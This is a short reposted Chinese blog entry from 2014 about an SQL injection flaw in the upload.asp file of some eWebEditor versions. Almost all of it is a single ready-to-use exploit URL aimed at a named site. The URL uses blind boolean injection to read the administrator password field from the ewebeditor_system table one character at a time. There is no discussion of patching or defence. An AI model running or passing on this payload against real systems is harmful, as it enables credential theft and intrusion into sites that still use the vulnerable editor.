专注网络安全,苦逼的编程员and苦逼的网工。

最爱墓尸妹纸

© 最爱墓尸妹纸 | Powered by LOFTER

ewebeditor某些版本upload.asp文件注入漏洞

chengker:

某些些版本的ewebeditor编辑器的upload.asp文件存在注入漏洞! 

信息错误则返回脚本出错的提示,在浏览器左下角!

具体利用如下:

  1. https://www.netknight.in/ewebeditor/Upload.asp?type=FILEstyle=standard_coolblue1'and%20(select%20top%201%20asc(mid(sys_userpass,15,1))%20from%20ewebeditor_system%20)>98%20and%20'1'='1


 

时间 2014/02/26 热度 1
#漏洞
转载自:chengker
评论
热度(1)